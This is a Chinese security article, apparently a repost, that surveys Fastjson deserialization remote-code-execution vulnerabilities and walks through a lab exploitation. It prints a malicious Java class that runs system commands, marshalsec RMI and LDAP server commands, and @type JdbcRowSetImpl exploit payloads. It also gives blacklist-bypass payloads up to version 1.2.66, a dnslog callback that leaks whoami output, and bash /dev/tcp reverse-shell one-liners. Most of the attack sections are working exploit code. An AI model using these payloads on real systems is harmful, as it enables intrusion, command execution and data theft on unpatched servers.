温故而知新之某json远程命令执行漏洞总结

admin 2022年1月3日08:33:16评论355 views字数 9777阅读32分35秒阅读模式

温故而知新之某json远程命令执行漏洞总结

网安教育

培养网络安全人才

技术交流、学习咨询



1.FastJson 简介
温故而知新之某json远程命令执行漏洞总结


fastjson.jar包原始下载地址:https://github.com/alibaba/fastjson


fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。fastjson.jar是阿里开发的一款专门用于Java开发的包,可以方便的实现json对象与JavaBean对象的转换,实现JavaBean对象与json字符串的转换,实现json对象与json字符串的转换。除了这个fastjson以外,还有Google开发的Gson包,其他形式的如net.sf.json包,都可以实现json的转换。方法名称不同而已,最后的实现结果都是一样的。

1将json字符串转化为json对象
2在net.sf.json中是这么做的
3JSONObject obj = new JSONObject().fromObject(jsonStr);//将json字符串转换为json对象
4在fastjson中是这么做的
5JSONObject obj=JSON.parseObject(jsonStr);//将json字符串转换为json对象


1.1 JNDI


JNDI是 Java 命名与目录接口(Java Naming and Directory Interface),在J2EE规范中是重要的规范之一。JNDI提供统一的客户端API,为开发人员提供了查找和访问各种命名和目录服务的通用、统一的接口,可以用来定位用户、网络、机器、对象和服务等各种资源。比如可以利用JNDI再局域网上定位一台打印机,也可以用JNDI来定位数据库服务或一个远程Java对象。JNDI底层支持RMI远程对象,RMI注册的服务可以通过JNDI接口来访问和调用。


JNDi是应用程序设计的Api,JNDI可以根据名字动态加载数据,支持的服务主要有以下几种:

1DNS、LDAP、CORBA对象服务、RMI


1.2 利用JNDI References进行注入


对于这个知识点,我们需要先了解RMI的作用。

首先RMI(Remote Method Invocation)是专为Java环境设计的远程方法调用机制,远程服务器实现具体的Java方法并提供接口,客户端本地仅需根据接口类的定义,提供相应的参数即可调用远程方法。RMI依赖的通信协议为JRMP(Java Remote Message Protocol ,Java 远程消息交换协议),该协议为Java定制,要求服务端与客户端都为Java编写。这个协议就像HTTP协议一样,规定了客户端和服务端通信要满足的规范。在RMI中对象是通过序列化方式进行编码传输的。RMI服务端可以直接绑定远程调用的对象以外,还可通过References类来绑定一个外部的远程对象,当RMI绑定了References之后,首先会利用Referenceable.getReference()获取绑定对象的引用,并在目录中保存,当客户端使用lookup获取对应名字时,会返回ReferenceWrapper类的代理文件,然后会调用getReference()获取Reference类,最终通过factory类将Reference转换为具体的对象实例。


服务端

 1import com.sun.jndi.rmi.registry.ReferenceWrapper;
2import javax.naming.Reference;
3import java.rmi.registry.LocateRegistry;
4import java.rmi.registry.Registry;
5public class RMIServer {
6 public static void main(String args[]) throws Exception {
7 Registry registry = LocateRegistry.createRegistry(1099);
8 // Reference需要传入三个参数(className,factory,factoryLocation)
9 // 第一个参数随意填写即可,第二个参数填写我们http服务下的类名,第三个参数填写我们的远程地址
10 Reference refObj = new Reference("Evil""EvilObject""http://127.0.0.1:8000/");
11 // ReferenceWrapper包裹Reference类,使其能够通过RMI进行远程访问
12 ReferenceWrapper refObjWrapper = new ReferenceWrapper(refObj);
13     registry.bind("refObj", refObjWrapper);
14 }
15}


从ReferenceWrapper源码可以看出,该类继承自UnicastRemoteObject,实现对Reference的包裹,使其能够通过RMI进行远程访问

温故而知新之某json远程命令执行漏洞总结

客户端

 1import javax.naming.Context;
2import javax.naming.InitialContext;
3import javax.naming.NamingException;
4public class JNDIClient {
5 public static void main(String[] args) throws Exception{
6 try {
7 Context ctx = new InitialContext();
8 ctx.lookup("rmi://localhost:8000/refObj");
9 }
10 catch (NamingException e) {
11 e.printStackTrace();
12 }
13 }
14}


如果我们可以控制JNDI客户端中传入的url,就可以起一个恶意的RMI,让JNDI来加载我们的恶意类从而进行命令执行。


我们来看一下References,References类有两个属性,className和codebase url,className就是远程引用的类名,codebase决定了我们远程类的位置,当本地classpath中没有找到对应的类的时候,就会去请求codebase地址下的类(codebase支持http协议),此时如果我们将codebase地址下的类换成我们的恶意类,就能让客户端执行。


ps:在java版本大于1.8u191之后版本存在trustCodebaseURL的限制,只能信任已有的codebase地址,不再能够从指定codebase中下载字节码。


整个利用流程如下

11.首先开启HTTP服务器,并将我们的恶意类放在目录下
22.开启恶意RMI服务器
33.攻击者控制url参数为上一步开启的恶意RMI服务器地址
44.恶意RMI服务器返回ReferenceWrapper类
55.目标(JNDI_Client)在执行lookup操作的时候,在decodeObject中将ReferenceWrapper变成Reference类,然后远程加载并实例化我们的Factory类(即远程加载我们HTTP服务器上的恶意类),在实例化时触发静态代码片段中的恶意代码



2.FastJson渗透总结
温故而知新之某json远程命令执行漏洞总结



1.反序列化常用的两种利用方式,一种是基于rmi,一种是基于ldap。

2.RMI是一种行为,指的是Java远程方法调用。

3.JNDI是一个接口,在这个接口下会有多种目录系统服务的实现,通过名称等去找到相关的对象,并把它下载到客户端中来。

4.ldap指轻量级目录服务协议。


存在Java版本限制:

1基于rmi的利用方式:适用jdk版本:JDK 6u132JDK 7u131JDK 8u121之前;
2jdk8u122的时候,加了反序列化白名单的机制,关闭了rmi远程加载代码。
3基于ldap的利用方式,适用jdk版本:JDK 11.0.1、8u191、7u201、6u211之前。
4Java 8u191更新中,OracleLDAP向量设置了相同的限制,并发布了CVE-2018-3149,关闭了JNDI远程类加载。
5可以看到ldap的利用范围是比rmi要大的,实战情况下推荐使用ldap方法进行利用。


2.1 fastjson 1.2.24反序列化导致任意命令执行漏洞(CVE-2017-18349)


漏洞原理

FastJson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

通俗理解就是:漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大影响。


影响版本

Fastjson < 1.2.25


漏洞启动

靶机:Ubuntu ip:192.168.9.234 攻击机:kali ip:192.168.10.65

开启fastjson漏洞

1docker-compose up -d
2docker ps


温故而知新之某json远程命令执行漏洞总结

温故而知新之某json远程命令执行漏洞总结

访问靶机,可以看见json格式的输出:

温故而知新之某json远程命令执行漏洞总结

温故而知新之某json远程命令执行漏洞总结

因为是Java 8u102,没有com.sun.jndi.rmi.object.trustURLCodebase的限制,我们可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。

在kali上执行下面这条命令,使用 curl命令模拟json格式的POST请求,返回json格式的请求结果,没报404,正常情况下说明存在该漏洞。

1curl http://192.168.9.234:8090/ -H "Content-Type: application/json" --data '{"name":"zcc""age":18}'


温故而知新之某json远程命令执行漏洞总结


kali安装Javac环境,这里我已经安装好了

1cd /opt
2curl http://www.joaomatosf.com/rnp/java_files/jdk-8u20-linux-x64.tar.gz -o jdk-8u20-linux-x64.tar.gz
3tar zxvf jdk-8u20-linux-x64.tar.gz
4rm -rf /usr/bin/java*
5ln -s /opt/jdk1.8.0_20/bin/j* /usr/bin
6javac -version
7java -version


温故而知新之某json远程命令执行漏洞总结


编译恶意类代码

 1import java.lang.Runtime;
2import java.lang.Process;
3public class zcc{
4 static {
5 try {
6 Runtime rt = Runtime.getRuntime();
7 String[] commands = {"touch""/tmp/zcctest"};
8 Process pc = rt.exec(commands);
9 pc.waitFor();
10 } catch (Exception e) {
11 // do nothing
12 }
13 }
14}


温故而知新之某json远程命令执行漏洞总结

温故而知新之某json远程命令执行漏洞总结


1javac zcc.java


温故而知新之某json远程命令执行漏洞总结


搭建http服务传输恶意文件

1python -m SimpleHTTPServer 80


温故而知新之某json远程命令执行漏洞总结

编译并开启RMI服务:

1 下载marshalsec(我这里已经安装好):

1git clone https://github.com/mbechler/marshalsec.git

温故而知新之某json远程命令执行漏洞总结

2 然后安装maven:

1apt-get install maven

温故而知新之某json远程命令执行漏洞总结

3 然后使用maven编译marshalsec成jar包,我们先进入下载的marshalsec文件中运行:

1mvn clean package -DskipTests


温故而知新之某json远程命令执行漏洞总结

温故而知新之某json远程命令执行漏洞总结


4 然后我们借助marshalsec项目,启动一个RMI服务器,监听9999端口,这里的ip为你上面开启http服务的ip,我们这里就是kali的ip:

1java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.10.65/#zcc" 9999


这里如果要启动LDAP服务的话,只需把上面命令中的RMI改成LDAP即可,例如:

1java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.10.65/#zcc" 9999


温故而知新之某json远程命令执行漏洞总结

可以看见请求成功,并加载了恶意类。

5 使用BP抓包,并写入poc(记住请求包里面请求方式改成post,Content-Type改成application/json):

1{
2 "b":{
3 "@type":"com.sun.rowset.JdbcRowSetImpl",
4 "dataSourceName":"rmi://192.168.10.65:9999/zcc",
5 "autoCommit":true
6 }
7}


温故而知新之某json远程命令执行漏洞总结

温故而知新之某json远程命令执行漏洞总结

温故而知新之某json远程命令执行漏洞总结

温故而知新之某json远程命令执行漏洞总结

温故而知新之某json远程命令执行漏洞总结


可以看见成功写入。

这里我们用dnslog做一个小测试:

1http://www.dnslog.cn/


温故而知新之某json远程命令执行漏洞总结

直接覆盖原来得文件;

1"/bin/sh","-c","ping user.'whoami'.jeejay.dnslog.cn"


温故而知新之某json远程命令执行漏洞总结

温故而知新之某json远程命令执行漏洞总结


点击send发送之后成功回显

温故而知新之某json远程命令执行漏洞总结


反弹shell的话也只需修改恶意类中commands的内容即可,代码参考如下,建议用第二个,第二个前面带主机名,看起来舒服点,我这里用的第一个;

1"/bin/bash","-c","exec 5<>/dev/tcp/192.168.10.65/8899;cat <&5 | while read line; do $line 2>&5 >&5; done"
2或者
3"/bin/bash""-c""bash -i >& /dev/tcp/192.168.10.65/1234 0>&1"


温故而知新之某json远程命令执行漏洞总结

温故而知新之某json远程命令执行漏洞总结


2.2 Fastjson 1.2.47远程命令执行漏洞


漏洞原理

Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。


影响版本

1Fastjson < 1.2.47


漏洞启动

温故而知新之某json远程命令执行漏洞总结

温故而知新之某json远程命令执行漏洞总结



因为目标环境是openjdk:8u102,这个版本没有com.sun.jndi.rmi.object.trustURLCodebase的限制,我们可以利用RMI进行命令执行。

温故而知新之某json远程命令执行漏洞总结


 1// javac TouchFile.java
2import java.lang.Runtime;
3import java.lang.Process;
4public class zcc {
5 static {
6 try {
7 Runtime rt = Runtime.getRuntime();
8 String[] commands = {"touch""/tmp/zcctest111"};
9 Process pc = rt.exec(commands);
10 pc.waitFor();
11 } catch (Exception e) {
12 // do nothing
13 }
14 }
15}


温故而知新之某json远程命令执行漏洞总结

温故而知新之某json远程命令执行漏洞总结


开启http服务

1python -m SimpleHTTPServer 8080


温故而知新之某json远程命令执行漏洞总结

温故而知新之某json远程命令执行漏洞总结

借助marshalsec项目启动RMI服务器,监听9998端口,并制定加载远程类zcc.class:

1java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.10.65/#zcc" 9999


温故而知新之某json远程命令执行漏洞总结


发送payload,别忘了改Content-Type: application/json,可以看见成功写入,反弹shell的手段和上面1.2.24的一样:

 1{
2 "a":{
3 "@type":"java.lang.Class",
4 "val":"com.sun.rowset.JdbcRowSetImpl"
5 },
6 "b":{
7 "@type":"com.sun.rowset.JdbcRowSetImpl",
8 "dataSourceName":"rmi://192.168.10.65:9999/zcc",
9 "autoCommit":true
10 }
11}


温故而知新之某json远程命令执行漏洞总结

温故而知新之某json远程命令执行漏洞总结


温故而知新之某json远程命令执行漏洞总结


反弹shell;

1"/bin/bash""-c""bash -i >& /dev/tcp/192.168.10.65/8899 0>&1"


温故而知新之某json远程命令执行漏洞总结


温故而知新之某json远程命令执行漏洞总结


2.3 fastjson<=1.2.41漏洞详情


第一个Fastjson反序列化漏洞爆出后,阿里在1.2.25版本设置了autoTypeSupport属性默认为false,并且增加了checkAutoType()函数,通过黑白名单的方式来防御Fastjson反序列化漏洞,因此后面发现的Fastjson反序列化漏洞都是针对黑名单绕过来实现攻击利用的目的的。com.sun.rowset.jdbcRowSetlmpl在1.2.25版本被加入了黑名单,fastjson有个判断条件判断类名是否以"L"开头、以";"结尾,是的话就提取出其中的类名在加载进来,因此在原类名头部加L,尾部加;即可绕过黑名单的同时加载类。

exp:

1{           
2    "@type":"Lcom.sun.rowset.JdbcRowSetImpl;",
3     "dataSourceName":"rmi://x.x.x.x:9999/rce_1_2_24_exploit",
4    "autoCommit":true
5}


autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)


2.4 fastjson<=1.2.42漏洞详情


fastjson在1.2.42版本新增了校验机制。如果输入类名的开头和结尾是L和;就将头尾去掉再进行黑名单校验。绕过方法:在类名外部嵌套两层L和;。

1原类名:com.sun.rowset.JdbcRowSetImpl
2绕过:LLcom.sun.rowset.JdbcRowSetImpl;;


exp:

1{           
2    "@type":"LLcom.sun.rowset.JdbcRowSetImpl;;",
3    "dataSourceName":"rmi://x.x.x.x:9999/exp",
4    "autoCommit":true
5}


autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)


2.5 fastjson<=1.2.45漏洞详情


前提条件:目标服务器存在mybatis的jar包,且版本需为3.x.x系列<3.5.0的版本。

使用黑名单绕过,org.apache.ibatis.datasource在1.2.46版本被加入了黑名单。

autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)

exp:

1{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1389/Exploit"}}{           
2    "@type":"LLcom.sun.rowset.JdbcRowSetImpl;;",
3    "dataSourceName":"rmi://x.x.x.x:9999/exp",
4    "autoCommit":true
5}


2.6 fastjson<=1.2.47漏洞详情


对版本小于1.2.48的版本通杀,autoType为关闭状态也可用。loadClass中默认cache为true,利用分2步,首先使用java.lang.Class把获取到的类缓存到mapping中,然后直接从缓存中获取到了com.sun.rowset.jdbcRowSetlmpl这个类,绕过了黑名单机制。

exp:

 1{
2 "a": {
3 "@type""java.lang.Class"
4 "val""com.sun.rowset.JdbcRowSetImpl"
5 }, 
6 "b": {
7 "@type""com.sun.rowset.JdbcRowSetImpl"
8 "dataSourceName""rmi://x.x.x.x:9999/exp"
9 "autoCommit"true
10 }
11}


2.7 fastjson<=1.2.62漏洞详情


基于黑名单绕过exp:

1{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://x.x.x.x:9999/exploit"}";
2


2.8 fastjson<=1.2.66漏洞详情


也是基于黑名单绕过,autoTypeSupport属性为true才能使用,(fastjson>=1.2.25默认为false)以下是几个exp:

1{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}
2{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}
3{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}
4{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":         {"@type":"java.util.Properties","UserTransacti
5on"
:"ldap://192.168.80.1:1389/Calc"}}


温故而知新之某json远程命令执行漏洞总结

原文作者:南极进口哈士奇

原文链接:https://xz.aliyun.com/t/10041#toc-0

版权声明:著作权归作者所有。如有侵权请联系删除


开源聚合网安训练营

战疫期间,开源聚合网络安全基础班、实战班线上全面开启,学网络安全技术、升职加薪……有兴趣的可以加入开源聚合网安大家庭,一起学习、一起成长,考证书求职加分、升级加薪,有兴趣的可以咨询客服小姐姐哦!

温故而知新之某json远程命令执行漏洞总结

加QQ(1005989737)找小姐姐私聊哦



精选文章


环境搭建
Python
学员专辑
信息收集
CNVD
安全求职
渗透实战
CVE
高薪揭秘
渗透测试工具
网络安全行业
神秘大礼包
基础教程
我们贴心备至
用户答疑
 QQ在线客服
加入社群
QQ+微信等着你

温故而知新之某json远程命令执行漏洞总结


我就知道你“在看”
温故而知新之某json远程命令执行漏洞总结

本文始发于微信公众号(开源聚合网络空间安全研究院):温故而知新之某json远程命令执行漏洞总结

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月3日08:33:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   温故而知新之某json远程命令执行漏洞总结https://cn-sec.com/archives/469220.html

发表评论

匿名网友 填写信息